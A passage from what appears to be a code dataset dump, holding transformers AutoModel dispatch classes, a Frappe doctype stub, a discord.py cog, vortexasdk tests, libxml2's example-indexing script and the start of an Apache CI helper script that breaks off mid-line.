``shortcut-name`` string of a pretrained model), or\n - the model was saved using :func:`~transformers.PreTrainedModel.save_pretrained` and is reloaded by suppling the save directory.\n - the model is loaded by suppling a local directory as ``pretrained_model_name_or_path`` and a configuration JSON file named `config.json` is found in the directory.\n\n state_dict: (`optional`) dict:\n an optional state dictionnary for the model to use instead of a state dictionary loaded from saved weights file.\n This option can be used if you want to create a model from a pretrained configuration but load your own weights.\n In this case though, you should check if using :func:`~transformers.PreTrainedModel.save_pretrained` and :func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.\n\n cache_dir: (`optional`) string:\n Path to a directory in which a downloaded pre-trained model\n configuration should be cached if the standard cache should not be used.\n\n force_download: (`optional`) boolean, default False:\n Force to (re-)download the model weights and configuration files and override the cached versions if they exists.\n resume_download: (`optional`) boolean, default False:\n Do not delete incompletely recieved file. Attempt to resume the download if such a file exists.\n\n proxies: (`optional`) dict, default None:\n A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}.\n The proxies are used on each request.\n\n output_loading_info: (`optional`) boolean:\n Set to ``True`` to also return a dictionnary containing missing keys, unexpected keys and error messages.\n\n kwargs: (`optional`) Remaining dictionary of keyword arguments:\n Can be used to update the configuration object (after it being loaded) and initiate the model. (e.g. ``output_attention=True``). Behave differently depending on whether a `config` is provided or automatically loaded:\n\n - If a configuration is provided with ``config``, ``**kwargs`` will be directly passed to the underlying model's ``__init__`` method (we assume all relevant updates to the configuration have already been done)\n - If a configuration is not provided, ``kwargs`` will be first passed to the configuration class initialization function (:func:`~transformers.PretrainedConfig.from_pretrained`). Each key of ``kwargs`` that corresponds to a configuration attribute will be used to override said attribute with the supplied ``kwargs`` value. Remaining keys that do not correspond to any configuration attribute will be passed to the underlying model's ``__init__`` function.\n\n Examples::\n\n model = AutoModelWithLMHead.from_pretrained('bert-base-uncased') # Download model and configuration from S3 and cache.\n model = AutoModelWithLMHead.from_pretrained('./test/bert_model/') # E.g. model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModelWithLMHead.from_pretrained('bert-base-uncased', output_attention=True) # Update configuration during loading\n assert model.config.output_attention == True\n # Loading from a TF checkpoint file instead of a PyTorch model (slower)\n config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')\n model = AutoModelWithLMHead.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)\n\n \"\"\"\n if 't5' in pretrained_model_name_or_path:\n return T5WithLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'distilbert' in pretrained_model_name_or_path:\n return DistilBertForMaskedLM.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'albert' in pretrained_model_name_or_path:\n return AlbertForMaskedLM.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'camembert' in pretrained_model_name_or_path:\n return CamembertForMaskedLM.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'roberta' in pretrained_model_name_or_path:\n return RobertaForMaskedLM.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'bert' in pretrained_model_name_or_path:\n return BertForMaskedLM.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'openai-gpt' in pretrained_model_name_or_path:\n return OpenAIGPTLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'gpt2' in pretrained_model_name_or_path:\n return GPT2LMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'transfo-xl' in pretrained_model_name_or_path:\n return TransfoXLLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlnet' in pretrained_model_name_or_path:\n return XLNetLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlm' in pretrained_model_name_or_path:\n return XLMWithLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'ctrl' in pretrained_model_name_or_path:\n return CTRLLMHeadModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n raise ValueError(\"Unrecognized model identifier in {}. Should contains one of \"\n \"'bert', 'openai-gpt', 'gpt2', 'transfo-xl', 'xlnet', \"\n \"'xlm', 'roberta','ctrl', 'distilbert', 'camembert', 'albert'\".format(pretrained_model_name_or_path))\n\n\nclass AutoModelForSequenceClassification(object):\n r\"\"\"\n :class:`~transformers.AutoModelForSequenceClassification` is a generic model class\n that will be instantiated as one of the sequence classification model classes of the library\n when created with the `AutoModelForSequenceClassification.from_pretrained(pretrained_model_name_or_path)`\n class method.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `distilbert`: DistilBertForSequenceClassification (DistilBERT model)\n - contains `albert`: AlbertForSequenceClassification (ALBERT model)\n - contains `camembert`: CamembertForSequenceClassification (CamemBERT model)\n - contains `roberta`: RobertaForSequenceClassification (RoBERTa model)\n - contains `bert`: BertForSequenceClassification (Bert model)\n - contains `xlnet`: XLNetForSequenceClassification (XLNet model)\n - contains `xlm`: XLMForSequenceClassification (XLM model)\n\n This class cannot be instantiated using `__init__()` (throws an error).\n \"\"\"\n def __init__(self):\n raise EnvironmentError(\"AutoModelWithLMHead is designed to be instantiated \"\n \"using the `AutoModelWithLMHead.from_pretrained(pretrained_model_name_or_path)` method.\")\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):\n r\"\"\" Instantiates one of the sequence classification model classes of the library\n from a pre-trained model configuration.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `distilbert`: DistilBertForSequenceClassification (DistilBERT model)\n - contains `albert`: AlbertForSequenceClassification (ALBERT model)\n - contains `camembert`: CamembertForSequenceClassification (CamemBERT model)\n - contains `roberta`: RobertaForSequenceClassification (RoBERTa model)\n - contains `bert`: BertForSequenceClassification (Bert model)\n - contains `xlnet`: XLNetForSequenceClassification (XLNet model)\n - contains `xlm`: XLMForSequenceClassification (XLM model)\n\n The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated)\n To train the model, you should first set it back in training mode with `model.train()`\n\n Params:\n pretrained_model_name_or_path: either:\n\n - a string with the `shortcut name` of a pre-trained model to load from cache or download, e.g.: ``bert-base-uncased``.\n - a string with the `identifier name` of a pre-trained model that was user-uploaded to our S3, e.g.: ``dbmdz/bert-base-german-cased``.\n - a path to a `directory` containing model weights saved using :func:`~transformers.PreTrainedModel.save_pretrained`, e.g.: ``./my_model_directory/``.\n - a path or url to a `tensorflow index checkpoint file` (e.g. `./tf_model/model.ckpt.index`). In this case, ``from_tf`` should be set to True and a configuration object should be provided as ``config`` argument. This loading path is slower than converting the TensorFlow checkpoint in a PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.\n\n model_args: (`optional`) Sequence of positional arguments:\n All remaning positional arguments will be passed to the underlying model's ``__init__`` method\n\n config: (`optional`) instance of a class derived from :class:`~transformers.PretrainedConfig`:\n Configuration for the model to use instead of an automatically loaded configuation. Configuration can be automatically loaded when:\n\n - the model is a model provided by the library (loaded with the ``shortcut-name`` string of a pretrained model), or\n - the model was saved using :func:`~transformers.PreTrainedModel.save_pretrained` and is reloaded by suppling the save directory.\n - the model is loaded by suppling a local directory as ``pretrained_model_name_or_path`` and a configuration JSON file named `config.json` is found in the directory.\n\n state_dict: (`optional`) dict:\n an optional state dictionnary for the model to use instead of a state dictionary loaded from saved weights file.\n This option can be used if you want to create a model from a pretrained configuration but load your own weights.\n In this case though, you should check if using :func:`~transformers.PreTrainedModel.save_pretrained` and :func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.\n\n cache_dir: (`optional`) string:\n Path to a directory in which a downloaded pre-trained model\n configuration should be cached if the standard cache should not be used.\n\n force_download: (`optional`) boolean, default False:\n Force to (re-)download the model weights and configuration files and override the cached versions if they exists.\n\n resume_download: (`optional`) boolean, default False:\n Do not delete incompletely recieved file. Attempt to resume the download if such a file exists.\n\n proxies: (`optional`) dict, default None:\n A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}.\n The proxies are used on each request.\n\n output_loading_info: (`optional`) boolean:\n Set to ``True`` to also return a dictionnary containing missing keys, unexpected keys and error messages.\n\n kwargs: (`optional`) Remaining dictionary of keyword arguments:\n Can be used to update the configuration object (after it being loaded) and initiate the model. (e.g. ``output_attention=True``). Behave differently depending on whether a `config` is provided or automatically loaded:\n\n - If a configuration is provided with ``config``, ``**kwargs`` will be directly passed to the underlying model's ``__init__`` method (we assume all relevant updates to the configuration have already been done)\n - If a configuration is not provided, ``kwargs`` will be first passed to the configuration class initialization function (:func:`~transformers.PretrainedConfig.from_pretrained`). Each key of ``kwargs`` that corresponds to a configuration attribute will be used to override said attribute with the supplied ``kwargs`` value. Remaining keys that do not correspond to any configuration attribute will be passed to the underlying model's ``__init__`` function.\n\n Examples::\n\n model = AutoModelForSequenceClassification.from_pretrained('bert-base-uncased') # Download model and configuration from S3 and cache.\n model = AutoModelForSequenceClassification.from_pretrained('./test/bert_model/') # E.g. model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModelForSequenceClassification.from_pretrained('bert-base-uncased', output_attention=True) # Update configuration during loading\n assert model.config.output_attention == True\n # Loading from a TF checkpoint file instead of a PyTorch model (slower)\n config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')\n model = AutoModelForSequenceClassification.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)\n\n \"\"\"\n if 'distilbert' in pretrained_model_name_or_path:\n return DistilBertForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'albert' in pretrained_model_name_or_path:\n return AlbertForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'camembert' in pretrained_model_name_or_path:\n return CamembertForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'roberta' in pretrained_model_name_or_path:\n return RobertaForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'bert' in pretrained_model_name_or_path:\n return BertForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlnet' in pretrained_model_name_or_path:\n return XLNetForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlm' in pretrained_model_name_or_path:\n return XLMForSequenceClassification.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n\n raise ValueError(\"Unrecognized model identifier in {}. Should contains one of \"\n \"'bert', 'xlnet', 'xlm', 'roberta', 'distilbert', 'camembert', 'albert'\".format(pretrained_model_name_or_path))\n\n\nclass AutoModelForQuestionAnswering(object):\n r\"\"\"\n :class:`~transformers.AutoModelForQuestionAnswering` is a generic model class\n that will be instantiated as one of the question answering model classes of the library\n when created with the `AutoModelForQuestionAnswering.from_pretrained(pretrained_model_name_or_path)`\n class method.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `distilbert`: DistilBertForQuestionAnswering (DistilBERT model)\n - contains `albert`: AlbertForQuestionAnswering (ALBERT model)\n - contains `bert`: BertForQuestionAnswering (Bert model)\n - contains `xlnet`: XLNetForQuestionAnswering (XLNet model)\n - contains `xlm`: XLMForQuestionAnswering (XLM model)\n\n This class cannot be instantiated using `__init__()` (throws an error).\n \"\"\"\n def __init__(self):\n raise EnvironmentError(\"AutoModelWithLMHead is designed to be instantiated \"\n \"using the `AutoModelWithLMHead.from_pretrained(pretrained_model_name_or_path)` method.\")\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):\n r\"\"\" Instantiates one of the question answering model classes of the library\n from a pre-trained model configuration.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `distilbert`: DistilBertForQuestionAnswering (DistilBERT model)\n - contains `albert`: AlbertForQuestionAnswering (ALBERT model)\n - contains `bert`: BertForQuestionAnswering (Bert model)\n - contains `xlnet`: XLNetForQuestionAnswering (XLNet model)\n - contains `xlm`: XLMForQuestionAnswering (XLM model)\n\n The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated)\n To train the model, you should first set it back in training mode with `model.train()`\n\n Params:\n pretrained_model_name_or_path: either:\n\n - a string with the `shortcut name` of a pre-trained model to load from cache or download, e.g.: ``bert-base-uncased``.\n - a string with the `identifier name` of a pre-trained model that was user-uploaded to our S3, e.g.: ``dbmdz/bert-base-german-cased``.\n - a path to a `directory` containing model weights saved using :func:`~transformers.PreTrainedModel.save_pretrained`, e.g.: ``./my_model_directory/``.\n - a path or url to a `tensorflow index checkpoint file` (e.g. `./tf_model/model.ckpt.index`). In this case, ``from_tf`` should be set to True and a configuration object should be provided as ``config`` argument. This loading path is slower than converting the TensorFlow checkpoint in a PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.\n\n model_args: (`optional`) Sequence of positional arguments:\n All remaning positional arguments will be passed to the underlying model's ``__init__`` method\n\n config: (`optional`) instance of a class derived from :class:`~transformers.PretrainedConfig`:\n Configuration for the model to use instead of an automatically loaded configuation. Configuration can be automatically loaded when:\n\n - the model is a model provided by the library (loaded with the ``shortcut-name`` string of a pretrained model), or\n - the model was saved using :func:`~transformers.PreTrainedModel.save_pretrained` and is reloaded by suppling the save directory.\n - the model is loaded by suppling a local directory as ``pretrained_model_name_or_path`` and a configuration JSON file named `config.json` is found in the directory.\n\n state_dict: (`optional`) dict:\n an optional state dictionnary for the model to use instead of a state dictionary loaded from saved weights file.\n This option can be used if you want to create a model from a pretrained configuration but load your own weights.\n In this case though, you should check if using :func:`~transformers.PreTrainedModel.save_pretrained` and :func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.\n\n cache_dir: (`optional`) string:\n Path to a directory in which a downloaded pre-trained model\n configuration should be cached if the standard cache should not be used.\n\n force_download: (`optional`) boolean, default False:\n Force to (re-)download the model weights and configuration files and override the cached versions if they exists.\n\n proxies: (`optional`) dict, default None:\n A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}.\n The proxies are used on each request.\n\n output_loading_info: (`optional`) boolean:\n Set to ``True`` to also return a dictionnary containing missing keys, unexpected keys and error messages.\n\n kwargs: (`optional`) Remaining dictionary of keyword arguments:\n Can be used to update the configuration object (after it being loaded) and initiate the model. (e.g. ``output_attention=True``). Behave differently depending on whether a `config` is provided or automatically loaded:\n\n - If a configuration is provided with ``config``, ``**kwargs`` will be directly passed to the underlying model's ``__init__`` method (we assume all relevant updates to the configuration have already been done)\n - If a configuration is not provided, ``kwargs`` will be first passed to the configuration class initialization function (:func:`~transformers.PretrainedConfig.from_pretrained`). Each key of ``kwargs`` that corresponds to a configuration attribute will be used to override said attribute with the supplied ``kwargs`` value. Remaining keys that do not correspond to any configuration attribute will be passed to the underlying model's ``__init__`` function.\n\n Examples::\n\n model = AutoModelForQuestionAnswering.from_pretrained('bert-base-uncased') # Download model and configuration from S3 and cache.\n model = AutoModelForQuestionAnswering.from_pretrained('./test/bert_model/') # E.g. model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModelForQuestionAnswering.from_pretrained('bert-base-uncased', output_attention=True) # Update configuration during loading\n assert model.config.output_attention == True\n # Loading from a TF checkpoint file instead of a PyTorch model (slower)\n config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')\n model = AutoModelForQuestionAnswering.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)\n\n \"\"\"\n if 'distilbert' in pretrained_model_name_or_path:\n return DistilBertForQuestionAnswering.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'albert' in pretrained_model_name_or_path:\n return AlbertForQuestionAnswering.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'bert' in pretrained_model_name_or_path:\n return BertForQuestionAnswering.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlnet' in pretrained_model_name_or_path:\n return XLNetForQuestionAnswering.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlm' in pretrained_model_name_or_path:\n return XLMForQuestionAnswering.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n\n raise ValueError(\"Unrecognized model identifier in {}. Should contains one of \"\n \"'bert', 'xlnet', 'xlm', 'distilbert', 'albert'\".format(pretrained_model_name_or_path))\n"} {"ext": "py", "sha": "1a30ea9efd97c86ae7beb4c6844d41e1b16c8874", "content": "# -*- coding: utf-8 -*-\n# Copyright (c) 2019, Dirk van der Laarse and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\n\nclass ProductLineProcessFlowWorkstation(Document):\n\tpass\n"} {"ext": "py", "sha": "1a30eabab07b631bdf05a2a6304a39b2b7499eb8", "content": "import discord\nfrom discord.ext import commands\n\nfrom Core.Commands.Settings.Functions.change_prefix import ChangePrefix\nfrom Core.Commands.Settings.Functions.change_status import ChangeStatus\n\n\nclass Settings(commands.Cog):\n \"\"\"Class contains commands with settings\n \"\"\"\n def __init__(self, bot):\n \"\"\"Constructor method\n \"\"\"\n self.bot = bot\n self.bot.add_cog(ChangePrefix(bot))\n self.bot.add_cog(ChangeStatus(bot))\n\n"} {"ext": "py", "sha": "1a30ead097047a3eb1e86ebf29d6a99bffac034f", "content": "from datetime import datetime\nfrom vortexasdk import FleetUtilisationOriginBreakdown\n\n\nfrom docs.utils import to_markdown\nfrom tests.testcases import TestCaseUsingRealAPI\n\n\nclass TestFleetUtilisationOriginBreakdownReal(TestCaseUsingRealAPI):\n def test_search_returns_one_day(self):\n date = datetime(2019, 11, 10)\n\n result = FleetUtilisationOriginBreakdown().search(\n filter_time_min=date,\n filter_time_max=date\n )\n\n assert len(result) > 0\n\n def test_to_df(self):\n start = datetime(2019, 11, 1)\n end = datetime(2019, 11, 10)\n\n df = (\n FleetUtilisationOriginBreakdown()\n .search(\n filter_time_min=start,\n filter_time_max=end\n )\n .to_df()\n )\n\n assert list(df.columns) == [\"key\", \"label\", \"value\", \"count\"]\n\n def test_with_params(self):\n start = datetime(2020, 10, 18)\n end = datetime(2021, 1, 18)\n\n df = (\n FleetUtilisationOriginBreakdown()\n .search(\n filter_time_min=start,\n filter_time_max=end,\n breakdown_size='5',\n breakdown_geography='country'\n )\n .to_df()\n )\n\n assert len(df) == 5\n\n def test_to_list(self):\n start = datetime(2019, 11, 1)\n end = datetime(2019, 11, 10)\n\n time_series_list = (\n FleetUtilisationOriginBreakdown()\n .search(\n filter_time_min=start,\n filter_time_max=end\n )\n .to_list()\n )\n\n assert len(time_series_list) > 0\n"} {"ext": "py", "sha": "1a30eb0238537dabf2d2fec11f2651c297c645a4", "content": "#!/usr/bin/python -u\n#\n# Indexes the examples and build an XML description\n#\nimport string\nimport glob\nimport sys\ntry:\n import libxml2\nexcept:\n sys.exit(1)\nsys.path.insert(0, \"..\")\nfrom apibuild import CParser, escape\n\nexamples = []\nextras = ['examples.xsl', 'index.py']\ntests = []\nsections = {}\nsymbols = {}\napi_dict = None\napi_doc = None\n\ndef load_api():\n global api_dict\n global api_doc\n\n if api_dict != None:\n return\n api_dict = {}\n try:\n print \"loading ../libxml2-api.xml\"\n api_doc = libxml2.parseFile(\"../libxml2-api.xml\")\n except:\n print \"failed to parse ../libxml2-api.xml\"\n\tsys.exit(1)\n\ndef find_symbol(name):\n global api_dict\n global api_doc\n\n if api_doc == None:\n load_api()\n\n if name == None:\n return\n if api_dict.has_key(name):\n return api_dict[name]\n ctxt = api_doc.xpathNewContext()\n res = ctxt.xpathEval(\"/api/symbols/*[@name = '%s']\" % (name))\n if type(res) == type([]) and len(res) >= 1:\n if len(res) > 1:\n\t print \"Found %d references to %s in the API\" % (len(res), name)\n\tnode = res[0]\n\ttyp = node.name\n\tfile = node.xpathEval(\"string(@file)\")\n\tinfo = node.xpathEval(\"string(info)\")\n else:\n print \"Reference %s not found in the API\" % (name)\n\treturn None\n ret = (typ, file, info)\n api_dict[name] = ret\n return ret\n\ndef parse_top_comment(filename, comment):\n res = {}\n lines = string.split(comment, \"\\n\")\n item = None\n for line in lines:\n while line != \"\" and (line[0] == ' ' or line[0] == '\\t'):\n\t line = line[1:]\n while line != \"\" and line[0] == '*':\n\t line = line[1:]\n while line != \"\" and (line[0] == ' ' or line[0] == '\\t'):\n\t line = line[1:]\n\ttry:\n\t (it, line) = string.split(line, \":\", 1)\n\t item = it\n\t while line != \"\" and (line[0] == ' ' or line[0] == '\\t'):\n\t\tline = line[1:]\n\t if res.has_key(item):\n\t res[item] = res[item] + \" \" + line\n\t else:\n\t\tres[item] = line\n\texcept:\n\t if item != None:\n\t if res.has_key(item):\n\t\t res[item] = res[item] + \" \" + line\n\t\telse:\n\t\t res[item] = line\n return res\n\ndef parse(filename, output):\n global symbols\n global sections\n\n parser = CParser(filename)\n parser.collect_references()\n idx = parser.parse()\n info = parse_top_comment(filename, parser.top_comment)\n output.write(\" <example filename='%s'>\\n\" % filename)\n try:\n synopsis = info['synopsis']\n\toutput.write(\" <synopsis>%s</synopsis>\\n\" % escape(synopsis));\n except:\n print \"Example %s lacks a synopsis description\" % (filename)\n try:\n purpose = info['purpose']\n\toutput.write(\" <purpose>%s</purpose>\\n\" % escape(purpose));\n except:\n print \"Example %s lacks a purpose description\" % (filename)\n try:\n usage = info['usage']\n\toutput.write(\" <usage>%s</usage>\\n\" % escape(usage));\n except:\n print \"Example %s lacks an usage description\" % (filename)\n try:\n test = info['test']\n\toutput.write(\" <test>%s</test>\\n\" % escape(test));\n\tprogname=filename[0:-2]\n\tcommand=string.replace(test, progname, './' + progname, 1)\n\ttests.append(command)\n except:\n pass\n try:\n author = info['author']\n\toutput.write(\" <author>%s</author>\\n\" % escape(author));\n except:\n print \"Example %s lacks an author description\" % (filename)\n try:\n copy = info['copy']\n\toutput.write(\" <copy>%s</copy>\\n\" % escape(copy));\n except:\n print \"Example %s lacks a copyright description\" % (filename)\n try:\n section = info['section']\n\toutput.write(\" <section>%s</section>\\n\" % escape(section));\n\tif sections.has_key(section):\n\t sections[section].append(filename)\n\telse:\n\t sections[section] = [filename]\n except:\n print \"Example %s lacks a section description\" % (filename)\n for topic in info.keys():\n if topic != \"purpose\" and topic != \"usage\" and \\\n\t topic != \"author\" and topic != \"copy\" and \\\n\t topic != \"section\" and topic != \"synopsis\" and topic != \"test\":\n\t str = info[topic]\n\t output.write(\" <extra topic='%s'>%s</extra>\\n\" % (\n\t escape(topic), escape(str)))\n output.write(\" <includes>\\n\")\n for include in idx.includes.keys():\n if include.find(\"libxml\") != -1:\n\t output.write(\" <include>%s</include>\\n\" % (escape(include)))\n output.write(\" </includes>\\n\")\n output.write(\" <uses>\\n\")\n for ref in idx.references.keys():\n id = idx.references[ref]\n\tname = id.get_name()\n\tline = id.get_lineno()\n\tif symbols.has_key(name):\n\t sinfo = symbols[name]\n\t refs = sinfo[0]\n\t # gather at most 5 references per symbols\n\t if refs > 5:\n\t continue\n\t sinfo.append(filename)\n\t sinfo[0] = refs + 1\n\telse:\n\t symbols[name] = [1, filename]\n\tinfo = find_symbol(name)\n\tif info != None:\n\t type = info[0]\n\t file = info[1]\n\t output.write(\" <%s line='%d' file='%s' name='%s'/>\\n\" % (type,\n\t line, file, name))\n\telse:\n\t type = id.get_type()\n\t output.write(\" <%s line='%d' name='%s'/>\\n\" % (type,\n\t line, name))\n\t \n output.write(\" </uses>\\n\")\n output.write(\" </example>\\n\")\n \n return idx\n\ndef dump_symbols(output):\n global symbols\n\n output.write(\" <symbols>\\n\")\n keys = symbols.keys()\n keys.sort()\n for symbol in keys:\n output.write(\" <symbol name='%s'>\\n\" % (symbol))\n\tinfo = symbols[symbol]\n\ti = 1\n\twhile i < len(info):\n\t output.write(\" <ref filename='%s'/>\\n\" % (info[i]))\n\t i = i + 1\n output.write(\" </symbol>\\n\")\n output.write(\" </symbols>\\n\")\n\ndef dump_sections(output):\n global sections\n\n output.write(\" <sections>\\n\")\n keys = sections.keys()\n keys.sort()\n for section in keys:\n output.write(\" <section name='%s'>\\n\" % (section))\n\tinfo = sections[section]\n\ti = 0\n\twhile i < len(info):\n\t output.write(\" <example filename='%s'/>\\n\" % (info[i]))\n\t i = i + 1\n output.write(\" </section>\\n\")\n output.write(\" </sections>\\n\")\n\ndef dump_Makefile():\n for file in glob.glob('*.xml'):\n extras.append(file)\n for file in glob.glob('*.res'):\n extras.append(file)\n Makefile=\"\"\"# Beware this is autogenerated by index.py\nINCLUDES = -I$(top_builddir)/include -I$(top_srcdir)/include -I@srcdir@/include @THREAD_CFLAGS@ @Z_CFLAGS@\nDEPS = $(top_builddir)/libxml2rr.la\nLDADDS = @STATIC_BINARIES@ $(top_builddir)/libxml2rr.la @THREAD_LIBS@ @Z_LIBS@ $(ICONV_LIBS) -lm @WIN32_EXTRA_LIBADD@\n\nrebuild: examples.xml index.html\n\nexamples.xml: index.py *.c\n\t-@($(srcdir)/index.py)\n\nindex.html: examples.xml examples.xsl\n\t-@(xsltproc examples.xsl examples.xml && echo \"Rebuilt web page\" && xmllint --valid --noout index.html)\n\ninstall-data-local: \n\t$(mkinstalldirs) $(DESTDIR)$(HTML_DIR)\n\t-@INSTALL@ -m 0644 $(srcdir)/*.html $(srcdir)/*.c $(srcdir)/*.xml $(srcdir)/*.xsl $(srcdir)/*.res $(DESTDIR)$(HTML_DIR)\n\n\"\"\"\n EXTRA_DIST=\"\"\n for extra in extras:\n EXTRA_DIST = EXTRA_DIST + extra + \" \"\n Makefile = Makefile + \"EXTRA_DIST=%s\\n\\n\" % (EXTRA_DIST)\n noinst_PROGRAMS=\"\"\n for example in examples:\n noinst_PROGRAMS = noinst_PROGRAMS + example + \" \"\n Makefile = Makefile + \"noinst_PROGRAMS=%s\\n\\n\" % (noinst_PROGRAMS)\n for example in examples:\n Makefile = Makefile + \"%s_SOURCES=%s.c\\n%s_LDFLAGS=\\n%s_DEPENDENCIES= $(DEPS)\\n%s_LDADD= @RDL_LIBS@ $(LDADDS)\\n\\n\" % (example, example, example,\n\t example, example)\n Makefile = Makefile + \"valgrind: \\n\\t$(MAKE) CHECKER='valgrind' tests\\n\\n\"\n Makefile = Makefile + \"tests: $(noinst_PROGRAMS)\\n\"\n Makefile = Makefile + \"\\t@(echo '## examples regression tests')\\n\"\n Makefile = Makefile + \"\\t@(echo > .memdump)\\n\"\n for test in tests:\n Makefile = Makefile + \"\\t@($(CHECKER) %s)\\n\" % (test)\n Makefile = Makefile + '\\t@(grep \"MORY ALLO\" .memdump | grep -v \"MEMORY ALLOCATED : 0\" ; exit 0)\\n'\n Makefile = Makefile + \"\\n\\n\"\n try:\n\told = open(\"Makefile.am\", \"r\").read()\n\tif old != Makefile:\n\t n = open(\"Makefile.am\", \"w\").write(Makefile)\n\t print \"Updated Makefile.am\"\n except:\n print \"Failed to read or save Makefile.am\"\n #\n # Autogenerate the .cvsignore too ...\n #\n ignore = \"\"\".memdump\nMakefile.in\nMakefile\n\"\"\"\n for example in examples:\n ignore = ignore + \"%s\\n\" % (example)\n try:\n\told = open(\".cvsignore\", \"r\").read()\n\tif old != ignore:\n\t n = open(\".cvsignore\", \"w\").write(ignore)\n\t print \"Updated .cvsignore\"\n except:\n print \"Failed to read or save .cvsignore\"\n \nif __name__ == \"__main__\":\n load_api()\n output = open(\"examples.xml\", \"w\")\n output.write(\"<examples>\\n\")\n\n for file in glob.glob('*.c'):\n\tparse(file, output)\n\texamples.append(file[:-2])\n\n dump_symbols(output)\n dump_sections(output)\n output.write(\"</examples>\\n\")\n output.close()\n dump_Makefile()\n\n"} {"ext": "py", "sha": "1a30eb5f6102248048690b72aa1c08654e618e5e", "content": "# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import print_function\n\nimport functools\nimport os\nimport pprint\nimport re\nimport sys\nimport subprocess\n\n\nperr = functools.partial(print, file=sys.stderr)\n\n\ndef dump_env_vars(prefix, pattern=None):\n if pattern is not None:\n match = lambda s: re.search(pattern, s)\n else:\n match = lambda s: True\n for name in sorted(os.environ):\n if name.startswith(prefix) and match(name):\n perr(\"- {0}: {1!r}\".format(name, os.environ[name]))\n\n\ndef run_cmd(cmdline):\n proc = subprocess.Popen(cmdline,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = proc.communicate()\n if proc.returncode != 0:\n raise RuntimeError(\"Command {cmdline} failed with code {returncode}, \"\n \"stderr was:\\n{stderr}\\n\"\n .format(cmdline=cmdline, returncode=proc.returncode,\n 